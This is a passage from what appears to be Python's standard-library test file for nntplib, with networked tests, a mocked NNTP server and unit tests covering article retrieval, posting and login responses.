continue
break
else:
self.skipTest("could not find a suitable article number")
self.assertTrue(resp.startswith("221 "), resp)
self.check_article_resp(resp, head, art_num)
resp, body = self.server.body(art_num)
self.assertTrue(resp.startswith("222 "), resp)
self.check_article_resp(resp, body, art_num)
resp, article = self.server.article(art_num)
self.assertTrue(resp.startswith("220 "), resp)
self.check_article_resp(resp, article, art_num)
# Tolerate running the tests from behind a NNTP virus checker
blacklist = lambda line: line.startswith(b'X-Antivirus')
filtered_head_lines = [line for line in head.lines
if not blacklist(line)]
filtered_lines = [line for line in article.lines
if not blacklist(line)]
self.assertEqual(filtered_lines, filtered_head_lines + [b''] + body.lines)
def test_capabilities(self):
# The server under test implements NNTP version 2 and has a
# couple of well-known capabilities. Just sanity check that we
# got them.
def _check_caps(caps):
caps_list = caps['LIST']
self.assertIsInstance(caps_list, (list, tuple))
self.assertIn('OVERVIEW.FMT', caps_list)
self.assertGreaterEqual(self.server.nntp_version, 2)
_check_caps(self.server.getcapabilities())
# This re-emits the command
resp, caps = self.server.capabilities()
_check_caps(caps)
def test_zlogin(self):
# This test must be the penultimate because further commands will be
# refused.
baduser = "notarealuser"
badpw = "notarealpassword"
# Check that bogus credentials cause failure
self.assertRaises(nntplib.NNTPError, self.server.login,
user=baduser, password=badpw, usenetrc=False)
# FIXME: We should check that correct credentials succeed, but that
# would require valid details for some server somewhere to be in the
# test suite, I think. Gmane is anonymous, at least as used for the
# other tests.
def test_zzquit(self):
# This test must be called last, hence the name
cls = type(self)
try:
self.server.quit()
finally:
cls.server = None
@classmethod
def wrap_methods(cls):
# Wrap all methods in a transient_internet() exception catcher
# XXX put a generic version in test.support?
def wrap_meth(meth):
@functools.wraps(meth)
def wrapped(self):
with socket_helper.transient_internet(self.NNTP_HOST):
meth(self)
return wrapped
for name in dir(cls):
if not name.startswith('test_'):
continue
meth = getattr(cls, name)
if not callable(meth):
continue
# Need to use a closure so that meth remains bound to its current
# value
setattr(cls, name, wrap_meth(meth))
def test_timeout(self):
with self.assertRaises(ValueError):
self.NNTP_CLASS(self.NNTP_HOST, timeout=0, usenetrc=False)
def test_with_statement(self):
def is_connected():
if not hasattr(server, 'file'):
return False
try:
server.help()
except (OSError, EOFError):
return False
return True
try:
server = self.NNTP_CLASS(self.NNTP_HOST,
timeout=support.INTERNET_TIMEOUT,
usenetrc=False)
with server:
self.assertTrue(is_connected())
self.assertTrue(server.help())
self.assertFalse(is_connected())
server = self.NNTP_CLASS(self.NNTP_HOST,
timeout=support.INTERNET_TIMEOUT,
usenetrc=False)
with server:
server.quit()
self.assertFalse(is_connected())
except SSLError as ssl_err:
# matches "[SSL: DH_KEY_TOO_SMALL] dh key too small"
if re.search(r'(?i)KEY.TOO.SMALL', ssl_err.reason):
raise unittest.SkipTest(f"Got {ssl_err} connecting "
f"to {self.NNTP_HOST!r}")
raise
NetworkedNNTPTestsMixin.wrap_methods()
EOF_ERRORS = (EOFError,)
if ssl is not None:
EOF_ERRORS += (ssl.SSLEOFError,)
class NetworkedNNTPTests(NetworkedNNTPTestsMixin, unittest.TestCase):
# This server supports STARTTLS (gmane doesn't)
NNTP_HOST = 'news.trigofacile.com'
GROUP_NAME = 'fr.comp.lang.python'
GROUP_PAT = 'fr.comp.lang.*'
NNTP_CLASS = NNTP
@classmethod
def setUpClass(cls):
support.requires("network")
with socket_helper.transient_internet(cls.NNTP_HOST):
try:
cls.server = cls.NNTP_CLASS(cls.NNTP_HOST,
timeout=support.INTERNET_TIMEOUT,
usenetrc=False)
except SSLError as ssl_err:
# matches "[SSL: DH_KEY_TOO_SMALL] dh key too small"
if re.search(r'(?i)KEY.TOO.SMALL', ssl_err.reason):
raise unittest.SkipTest(f"{cls} got {ssl_err} connecting "
f"to {cls.NNTP_HOST!r}")
raise
except EOF_ERRORS:
raise unittest.SkipTest(f"{cls} got EOF error on connecting "
f"to {cls.NNTP_HOST!r}")
@classmethod
def tearDownClass(cls):
if cls.server is not None:
cls.server.quit()
@unittest.skipUnless(ssl, 'requires SSL support')
class NetworkedNNTP_SSLTests(NetworkedNNTPTests):
# Technical limits for this public NNTP server (see http://www.aioe.org):
# "Only two concurrent connections per IP address are allowed and
# 400 connections per day are accepted from each IP address."
NNTP_HOST = 'nntp.aioe.org'
GROUP_NAME = 'comp.lang.python'
GROUP_PAT = 'comp.lang.*'
NNTP_CLASS = getattr(nntplib, 'NNTP_SSL', None)
# Disabled as it produces too much data
test_list = None
# Disabled as the connection will already be encrypted.
test_starttls = None
#
# Non-networked tests using a local server (or something mocking it).
#
class _NNTPServerIO(io.RawIOBase):
"""A raw IO object allowing NNTP commands to be received and processed
by a handler. The handler can push responses which can then be read
from the IO object."""
def __init__(self, handler):
io.RawIOBase.__init__(self)
# The channel from the client
self.c2s = io.BytesIO()
# The channel to the client
self.s2c = io.BytesIO()
self.handler = handler
self.handler.start(self.c2s.readline, self.push_data)
def readable(self):
return True
def writable(self):
return True
def push_data(self, data):
"""Push (buffer) some data to send to the client."""
pos = self.s2c.tell()
self.s2c.seek(0, 2)
self.s2c.write(data)
self.s2c.seek(pos)
def write(self, b):
"""The client sends us some data"""
pos = self.c2s.tell()
self.c2s.write(b)
self.c2s.seek(pos)
self.handler.process_pending()
return len(b)
def readinto(self, buf):
"""The client wants to read a response"""
self.handler.process_pending()
b = self.s2c.read(len(buf))
n = len(b)
buf[:n] = b
return n
def make_mock_file(handler):
sio = _NNTPServerIO(handler)
# Using BufferedRWPair instead of BufferedRandom ensures the file
# isn't seekable.
file = io.BufferedRWPair(sio, sio)
return (sio, file)
class MockedNNTPTestsMixin:
# Override in derived classes
handler_class = None
def setUp(self):
super().setUp()
self.make_server()
def tearDown(self):
super().tearDown()
del self.server
def make_server(self, *args, **kwargs):
self.handler = self.handler_class()
self.sio, file = make_mock_file(self.handler)
self.server = nntplib._NNTPBase(file, 'test.server', *args, **kwargs)
return self.server
class MockedNNTPWithReaderModeMixin(MockedNNTPTestsMixin):
def setUp(self):
super().setUp()
self.make_server(readermode=True)
class NNTPv1Handler:
"""A handler for RFC 977"""
welcome = "200 NNTP mock server"
def start(self, readline, push_data):
self.in_body = False
self.allow_posting = True
self._readline = readline
self._push_data = push_data
self._logged_in = False
self._user_sent = False
# Our welcome
self.handle_welcome()
def _decode(self, data):
return str(data, "utf-8", "surrogateescape")
def process_pending(self):
if self.in_body:
while True:
line = self._readline()
if not line:
return
self.body.append(line)
if line == b".\r\n":
break
try:
meth, tokens = self.body_callback
meth(*tokens, body=self.body)
finally:
self.body_callback = None
self.body = None
self.in_body = False
while True:
line = self._decode(self._readline())
if not line:
return
if not line.endswith("\r\n"):
raise ValueError("line doesn't end with \\r\\n: {!r}".format(line))
line = line[:-2]
cmd, *tokens = line.split()
#meth = getattr(self.handler, "handle_" + cmd.upper(), None)
meth = getattr(self, "handle_" + cmd.upper(), None)
if meth is None:
self.handle_unknown()
else:
try:
meth(*tokens)
except Exception as e:
raise ValueError("command failed: {!r}".format(line)) from e
else:
if self.in_body:
self.body_callback = meth, tokens
self.body = []
def expect_body(self):
"""Flag that the client is expected to post a request body"""
self.in_body = True
def push_data(self, data):
"""Push some binary data"""
self._push_data(data)
def push_lit(self, lit):
"""Push a string literal"""
lit = textwrap.dedent(lit)
lit = "\r\n".join(lit.splitlines()) + "\r\n"
lit = lit.encode('utf-8')
self.push_data(lit)
def handle_unknown(self):
self.push_lit("500 What?")
def handle_welcome(self):
self.push_lit(self.welcome)
def handle_QUIT(self):
self.push_lit("205 Bye!")
def handle_DATE(self):
self.push_lit("111 20100914001155")
def handle_GROUP(self, group):
if group == "fr.comp.lang.python":
self.push_lit("211 486 761 1265 fr.comp.lang.python")
else:
self.push_lit("411 No such group {}".format(group))
def handle_HELP(self):
self.push_lit("""\
100 Legal commands
authinfo user Name|pass Password|generic <prog> <args>
date
help
Report problems to <root@example.org>
.""")
def handle_STAT(self, message_spec=None):
if message_spec is None:
self.push_lit("412 No newsgroup selected")
elif message_spec == "3000234":
self.push_lit("223 3000234 <45223423@example.com>")
elif message_spec == "<45223423@example.com>":
self.push_lit("223 0 <45223423@example.com>")
else:
self.push_lit("430 No Such Article Found")
def handle_NEXT(self):
self.push_lit("223 3000237 <668929@example.org> retrieved")
def handle_LAST(self):
self.push_lit("223 3000234 <45223423@example.com> retrieved")
def handle_LIST(self, action=None, param=None):
if action is None:
self.push_lit("""\
215 Newsgroups in form "group high low flags".
comp.lang.python 0000052340 0000002828 y
comp.lang.python.announce 0000001153 0000000993 m
free.it.comp.lang.python 0000000002 0000000002 y
fr.comp.lang.python 0000001254 0000000760 y
free.it.comp.lang.python.learner 0000000000 0000000001 y
tw.bbs.comp.lang.python 0000000304 0000000304 y
.""")
elif action == "ACTIVE":
if param == "*distutils*":
self.push_lit("""\
215 Newsgroups in form "group high low flags"
gmane.comp.python.distutils.devel 0000014104 0000000001 m
gmane.comp.python.distutils.cvs 0000000000 0000000001 m
.""")
else:
self.push_lit("""\
215 Newsgroups in form "group high low flags"
.""")
elif action == "OVERVIEW.FMT":
self.push_lit("""\
215 Order of fields in overview database.
Subject:
From:
Date:
Message-ID:
References:
Bytes:
Lines:
Xref:full
.""")
elif action == "NEWSGROUPS":
assert param is not None
if param == "comp.lang.python":
self.push_lit("""\
215 Descriptions in form "group description".
comp.lang.python\tThe Python computer language.
.""")
elif param == "comp.lang.python*":
self.push_lit("""\
215 Descriptions in form "group description".
comp.lang.python.announce\tAnnouncements about the Python language. (Moderated)
comp.lang.python\tThe Python computer language.
.""")
else:
self.push_lit("""\
215 Descriptions in form "group description".
.""")
else:
self.push_lit('501 Unknown LIST keyword')
def handle_NEWNEWS(self, group, date_str, time_str):
# We hard code different return messages depending on passed
# argument and date syntax.
if (group == "comp.lang.python" and date_str == "20100913"
and time_str == "082004"):
# Date was passed in RFC 3977 format (NNTP "v2")
self.push_lit("""\
230 list of newsarticles (NNTP v2) created after Mon Sep 13 08:20:04 2010 follows
<a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com>
<f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com>
.""")
elif (group == "comp.lang.python" and date_str == "100913"
and time_str == "082004"):
# Date was passed in RFC 977 format (NNTP "v1")
self.push_lit("""\
230 list of newsarticles (NNTP v1) created after Mon Sep 13 08:20:04 2010 follows
<a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com>
<f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com>
.""")
elif (group == 'comp.lang.python' and
date_str in ('20100101', '100101') and
time_str == '090000'):
self.push_lit('too long line' * 3000 +
'\n.')
else:
self.push_lit("""\
230 An empty list of newsarticles follows
.""")
# (Note for experiments: many servers disable NEWNEWS.
# As of this writing, sicinfo3.epfl.ch doesn't.)
def handle_XOVER(self, message_spec):
if message_spec == "57-59":
self.push_lit(
"224 Overview information for 57-58 follows\n"
"57\tRe: ANN: New Plone book with strong Python (and Zope) themes throughout"
"\tDoug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>"
"\tSat, 19 Jun 2010 18:04:08 -0400"
"\t<4FD05F05-F98B-44DC-8111-C6009C925F0C@gmail.com>"
"\t<hvalf7$ort$1@dough.gmane.org>\t7103\t16"
"\tXref: news.gmane.io gmane.comp.python.authors:57"
"\n"
"58\tLooking for a few good bloggers"
"\tDoug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>"
"\tThu, 22 Jul 2010 09:14:14 -0400"
"\t<A29863FA-F388-40C3-AA25-0FD06B09B5BF@gmail.com>"
"\t\t6683\t16"
"\t"
"\n"
# A UTF-8 overview line from fr.comp.lang.python
"59\tRe: Message d'erreur incompréhensible (par moi)"
"\tEric Brunel <eric.brunel@pragmadev.nospam.com>"
"\tWed, 15 Sep 2010 18:09:15 +0200"
"\t<eric.brunel-2B8B56.18091515092010@news.wanadoo.fr>"
"\t<4c90ec87$0$32425$ba4acef3@reader.news.orange.fr>\t1641\t27"
"\tXref: saria.nerim.net fr.comp.lang.python:1265"
"\n"
".\n")
else:
self.push_lit("""\
224 No articles
.""")
def handle_POST(self, *, body=None):
if body is None:
if self.allow_posting:
self.push_lit("340 Input article; end with <CR-LF>.<CR-LF>")
self.expect_body()
else:
self.push_lit("440 Posting not permitted")
else:
assert self.allow_posting
self.push_lit("240 Article received OK")
self.posted_body = body
def handle_IHAVE(self, message_id, *, body=None):
if body is None:
if (self.allow_posting and
message_id == "<i.am.an.article.you.will.want@example.com>"):
self.push_lit("335 Send it; end with <CR-LF>.<CR-LF>")
self.expect_body()
else:
self.push_lit("435 Article not wanted")
else:
assert self.allow_posting
self.push_lit("235 Article transferred OK")
self.posted_body = body
sample_head = """\
From: "Demo User" <nobody@example.net>
Subject: I am just a test article
Content-Type: text/plain; charset=UTF-8; format=flowed
Message-ID: <i.am.an.article.you.will.want@example.com>"""
sample_body = """\
This is just a test article.
..Here is a dot-starting line.
-- Signed by Andr\xe9."""
sample_article = sample_head + "\n\n" + sample_body
def handle_ARTICLE(self, message_spec=None):
if message_spec is None:
self.push_lit("220 3000237 <45223423@example.com>")
elif message_spec == "<45223423@example.com>":
self.push_lit("220 0 <45223423@example.com>")
elif message_spec == "3000234":
self.push_lit("220 3000234 <45223423@example.com>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_article)
self.push_lit(".")
def handle_HEAD(self, message_spec=None):
if message_spec is None:
self.push_lit("221 3000237 <45223423@example.com>")
elif message_spec == "<45223423@example.com>":
self.push_lit("221 0 <45223423@example.com>")
elif message_spec == "3000234":
self.push_lit("221 3000234 <45223423@example.com>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_head)
self.push_lit(".")
def handle_BODY(self, message_spec=None):
if message_spec is None:
self.push_lit("222 3000237 <45223423@example.com>")
elif message_spec == "<45223423@example.com>":
self.push_lit("222 0 <45223423@example.com>")
elif message_spec == "3000234":
self.push_lit("222 3000234 <45223423@example.com>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_body)
self.push_lit(".")
def handle_AUTHINFO(self, cred_type, data):
if self._logged_in:
self.push_lit('502 Already Logged In')
elif cred_type == 'user':
if self._user_sent:
self.push_lit('482 User Credential Already Sent')
else:
self.push_lit('381 Password Required')
self._user_sent = True
elif cred_type == 'pass':
self.push_lit('281 Login Successful')
self._logged_in = True
else:
raise Exception('Unknown cred type {}'.format(cred_type))
class NNTPv2Handler(NNTPv1Handler):
"""A handler for RFC 3977 (NNTP "v2")"""
def handle_CAPABILITIES(self):
fmt = """\
101 Capability list:
VERSION 2 3
IMPLEMENTATION INN 2.5.1{}
HDR
LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT
OVER
POST
READER
."""
if not self._logged_in:
self.push_lit(fmt.format('\n AUTHINFO USER'))
else:
self.push_lit(fmt.format(''))
def handle_MODE(self, _):
raise Exception('MODE READER sent despite READER has been advertised')
def handle_OVER(self, message_spec=None):
return self.handle_XOVER(message_spec)
class CapsAfterLoginNNTPv2Handler(NNTPv2Handler):
"""A handler that allows CAPABILITIES only after login"""
def handle_CAPABILITIES(self):
if not self._logged_in:
self.push_lit('480 You must log in.')
else:
super().handle_CAPABILITIES()
class ModeSwitchingNNTPv2Handler(NNTPv2Handler):
"""A server that starts in transit mode"""
def __init__(self):
self._switched = False
def handle_CAPABILITIES(self):
fmt = """\
101 Capability list:
VERSION 2 3
IMPLEMENTATION INN 2.5.1
HDR
LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT
OVER
POST
{}READER
."""
if self._switched:
self.push_lit(fmt.format(''))
else:
self.push_lit(fmt.format('MODE-'))
def handle_MODE(self, what):
assert not self._switched and what == 'reader'
self._switched = True
self.push_lit('200 Posting allowed')
class NNTPv1v2TestsMixin:
def setUp(self):
super().setUp()
def test_welcome(self):
self.assertEqual(self.server.welcome, self.handler.welcome)
def test_authinfo(self):
if self.nntp_version == 2:
self.assertIn('AUTHINFO', self.server._caps)
self.server.login('testuser', 'testpw')
# if AUTHINFO is gone from _caps we also know that getcapabilities()
# has been called after login as it should
self.assertNotIn('AUTHINFO', self.server._caps)
def test_date(self):
resp, date = self.server.date()
self.assertEqual(resp, "111 20100914001155")
self.assertEqual(date, datetime.datetime(2010, 9, 14, 0, 11, 55))
def test_quit(self):
self.assertFalse(self.sio.closed)
resp = self.server.quit()
self.assertEqual(resp, "205 Bye!")
self.assertTrue(self.sio.closed)
def test_help(self):
resp, help = self.server.help()
self.assertEqual(resp, "100 Legal commands")
self.assertEqual(help, [
' authinfo user Name|pass Password|generic <prog> <args>',
' date',
' help',
'Report problems to <root@example.org>',
])
def test_list(self):
resp, groups = self.server.list()
self.assertEqual(len(groups), 6)
g = groups[1]
self.assertEqual(g,
GroupInfo("comp.lang.python.announce", "0000001153",
"0000000993", "m"))
resp, groups = self.server.list("*distutils*")
self.assertEqual(len(groups), 2)
g = groups[0]
self.assertEqual(g,
GroupInfo("gmane.comp.python.distutils.devel", "0000014104",
"0000000001", "m"))
def test_stat(self):
resp, art_num, message_id = self.server.stat(3000234)
self.assertEqual(resp, "223 3000234 <45223423@example.com>")
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
resp, art_num, message_id = self.server.stat("<45223423@example.com>")
self.assertEqual(resp, "223 0 <45223423@example.com>")
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<45223423@example.com>")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.stat("<non.existent.id>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.stat()
self.assertEqual(cm.exception.response, "412 No newsgroup selected")
def test_next(self):
resp, art_num, message_id = self.server.next()
self.assertEqual(resp, "223 3000237 <668929@example.org> retrieved")
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<668929@example.org>")
def test_last(self):
resp, art_num, message_id = self.server.last()
self.assertEqual(resp, "223 3000234 <45223423@example.com> retrieved")
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
def test_description(self):
desc = self.server.description("comp.lang.python")
self.assertEqual(desc, "The Python computer language.")
desc = self.server.description("comp.lang.pythonx")
self.assertEqual(desc, "")
def test_descriptions(self):
resp, groups = self.server.descriptions("comp.lang.python")
self.assertEqual(resp, '215 Descriptions in form "group description".')
self.assertEqual(groups, {
"comp.lang.python": "The Python computer language.",
})
resp, groups = self.server.descriptions("comp.lang.python*")
self.assertEqual(groups, {
"comp.lang.python": "The Python computer language.",
"comp.lang.python.announce": "Announcements about the Python language. (Moderated)",
})
resp, groups = self.server.descriptions("comp.lang.pythonx")
self.assertEqual(groups, {})
def test_group(self):
resp, count, first, last, group = self.server.group("fr.comp.lang.python")
self.assertTrue(resp.startswith("211 "), resp)
self.assertEqual(first, 761)
self.assertEqual(last, 1265)
self.assertEqual(count, 486)
self.assertEqual(group, "fr.comp.lang.python")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.group("comp.lang.python.devel")
exc = cm.exception
self.assertTrue(exc.response.startswith("411 No such group"),
exc.response)
def test_newnews(self):
# NEWNEWS comp.lang.python [20]100913 082004
dt = datetime.datetime(2010, 9, 13, 8, 20, 4)
resp, ids = self.server.newnews("comp.lang.python", dt)
expected = (
"230 list of newsarticles (NNTP v{0}) "
"created after Mon Sep 13 08:20:04 2010 follows"
).format(self.nntp_version)
self.assertEqual(resp, expected)
self.assertEqual(ids, [
"<a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com>",
"<f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com>",
])
# NEWNEWS fr.comp.lang.python [20]100913 082004
dt = datetime.datetime(2010, 9, 13, 8, 20, 4)
resp, ids = self.server.newnews("fr.comp.lang.python", dt)
self.assertEqual(resp, "230 An empty list of newsarticles follows")
self.assertEqual(ids, [])
def _check_article_body(self, lines):
self.assertEqual(len(lines), 4)
self.assertEqual(lines[-1].decode('utf-8'), "-- Signed by André.")
self.assertEqual(lines[-2], b"")
self.assertEqual(lines[-3], b".Here is a dot-starting line.")
self.assertEqual(lines[-4], b"This is just a test article.")
def _check_article_head(self, lines):
self.assertEqual(len(lines), 4)
self.assertEqual(lines[0], b'From: "Demo User" <nobody@example.net>')
self.assertEqual(lines[3], b"Message-ID: <i.am.an.article.you.will.want@example.com>")
def _check_article_data(self, lines):
self.assertEqual(len(lines), 9)
self._check_article_head(lines[:4])
self._check_article_body(lines[-4:])
self.assertEqual(lines[4], b"")
def test_article(self):
# ARTICLE
resp, info = self.server.article()
self.assertEqual(resp, "220 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_data(lines)
# ARTICLE num
resp, info = self.server.article(3000234)
self.assertEqual(resp, "220 3000234 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_data(lines)
# ARTICLE id
resp, info = self.server.article("<45223423@example.com>")
self.assertEqual(resp, "220 0 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_data(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.article("<non-existent@example.com>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_article_file(self):
# With a "file" argument
f = io.BytesIO()
resp, info = self.server.article(file=f)
self.assertEqual(resp, "220 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertTrue(data.startswith(
b'From: "Demo User" <nobody@example.net>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertTrue(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def test_head(self):
# HEAD
resp, info = self.server.head()
self.assertEqual(resp, "221 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_head(lines)
# HEAD num
resp, info = self.server.head(3000234)
self.assertEqual(resp, "221 3000234 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_head(lines)
# HEAD id
resp, info = self.server.head("<45223423@example.com>")
self.assertEqual(resp, "221 0 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_head(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.head("<non-existent@example.com>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_head_file(self):
f = io.BytesIO()
resp, info = self.server.head(file=f)
self.assertEqual(resp, "221 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertTrue(data.startswith(
b'From: "Demo User" <nobody@example.net>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertFalse(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def test_body(self):
# BODY
resp, info = self.server.body()
self.assertEqual(resp, "222 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_body(lines)
# BODY num
resp, info = self.server.body(3000234)
self.assertEqual(resp, "222 3000234 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_body(lines)
# BODY id
resp, info = self.server.body("<45223423@example.com>")
self.assertEqual(resp, "222 0 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_body(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.body("<non-existent@example.com>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_body_file(self):
f = io.BytesIO()
resp, info = self.server.body(file=f)
self.assertEqual(resp, "222 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertFalse(data.startswith(
b'From: "Demo User" <nobody@example.net>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertTrue(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def check_over_xover_resp(self, resp, overviews):
self.assertTrue(resp.startswith("224 "), resp)
self.assertEqual(len(overviews), 3)
art_num, over = overviews[0]
self.assertEqual(art_num, 57)
self.assertEqual(over, {
"from": "Doug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>",
"subject": "Re: ANN: New Plone book with strong Python (and Zope) themes throughout",
"date": "Sat, 19 Jun 2010 18:04:08 -0400",
"message-id": "<4FD05F05-F98B-44DC-8111-C6009C925F0C@gmail.com>",
"references": "<hvalf7$ort$1@dough.gmane.org>",
":bytes": "7103",
":lines": "16",
"xref": "news.gmane.io gmane.comp.python.authors:57"
})
art_num, over = overviews[1]
self.assertEqual(over["xref"], None)
art_num, over = overviews[2]
self.assertEqual(over["subject"],
"Re: Message d'erreur incompréhensible (par moi)")
def test_xover(self):
resp, overviews = self.server.xover(57, 59)
self.check_over_xover_resp(resp, overviews)
def test_over(self):
# In NNTP "v1", this will fallback on XOVER
resp, overviews = self.server.over((57, 59))
self.check_over_xover_resp(resp, overviews)
sample_post = (
b'From: "Demo User" <nobody@example.net>\r\n'
b'Subject: I am just a test article\r\n'
b'Content-Type: text/plain; charset=UTF-8; format=flowed\r\n'
b'Message-ID: <i.am.an.article.you.will.want@example.com>\r\n'
b'\r\n'
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
)
def _check_posted_body(self):
# Check the raw body as received by the server
lines = self.handler.posted_body
# One additional line for the "." terminator
self.assertEqual(len(lines), 10)
self.assertEqual(lines[-1], b'.\r\n')
self.assertEqual(lines[-2], b'-- Signed by Andr\xc3\xa9.\r\n')
self.assertEqual(lines[-3], b'\r\n')
self.assertEqual(lines[-4], b'..Here is a dot-starting line.\r\n')
self.assertEqual(lines[0], b'From: "Demo User" <nobody@example.net>\r\n')
def _check_post_ihave_sub(self, func, *args, file_factory):
# First the prepared post with CRLF endings
post = self.sample_post
func_args = args + (file_factory(post),)
self.handler.posted_body = None
resp = func(*func_args)
self._check_posted_body()
# Then the same post with "normal" line endings - they should be
# converted by NNTP.post and NNTP.ihave.
post = self.sample_post.replace(b"\r\n", b"\n")
func_args = args + (file_factory(post),)
self.handler.posted_body = None
resp = func(*func_args)
self._check_posted_body()
return resp
def check_post_ihave(self, func, success_resp, *args):
# With a bytes object
resp = self._check_post_ihave_sub(func, *args, file_factory=bytes)
self.assertEqual(resp, success_resp)
# With a bytearray object
resp = self._check_post_ihave_sub(func, *args, file_factory=bytearray)
self.assertEqual(resp, success_resp)
# With a file object
resp = self._check_post_ihave_sub(func, *args, file_factory=io.BytesIO)
self.assertEqual(resp, success_resp)
# With an iterable of terminated lines
def iterlines(b):
return iter(b.splitlines(keepends=True))
resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines)
self.assertEqual(resp, success_resp)
# With an iterable of non-terminated lines
def iterlines(b):
return iter(b.splitlines(keepends=False))
resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines)
self.assertEqual(resp, success_resp)
def test_post(self):
self.check_post_ihave(self.server.post, "240 Article received OK")
self.handler.allow_posting = False
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.post(self.sample_post)
self.assertEqual(cm.exception.response,
"440 Posting not permitted")
def test_ihave(self):
self.check_post_ihave(self.server.ihave, "235 Article transferred OK",
"<i.am.an.article.you.will.want@example.com>")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.ihave("<another.message.id>", self.sample_post)
self.assertEqual(cm.exception.response,
"435 Article not wanted")
def test_too_long_lines(self):
dt = datetime.datetime(2010, 1, 1, 9, 0, 0)
self.assertRaises(nntplib.NNTPDataError,
self.server.newnews, "comp.lang.python", dt)
class NNTPv1Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase):
"""Tests an NNTP v1 server (no capabilities)."""
nntp_version = 1
handler_class = NNTPv1Handler
def test_caps(self):
caps = self.server.getcapabilities()
self.assertEqual(caps, {})
self.assertEqual(self.server.nntp_version, 1)
self.assertEqual(self.server.nntp_implementation, None)
class NNTPv2Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase):
"""Tests an NNTP v2 server (with capabilities)."""
nntp_version = 2
handler_class = NNTPv2Handler
def test_caps(self):
caps = self.server.getcapabilities()
self.assertEqual(caps, {
'VERSION': ['2', '3'],
'IMPLEMENTATION': ['INN', '2.5.1'],
'AUTHINFO': ['USER'],
'HDR': [],
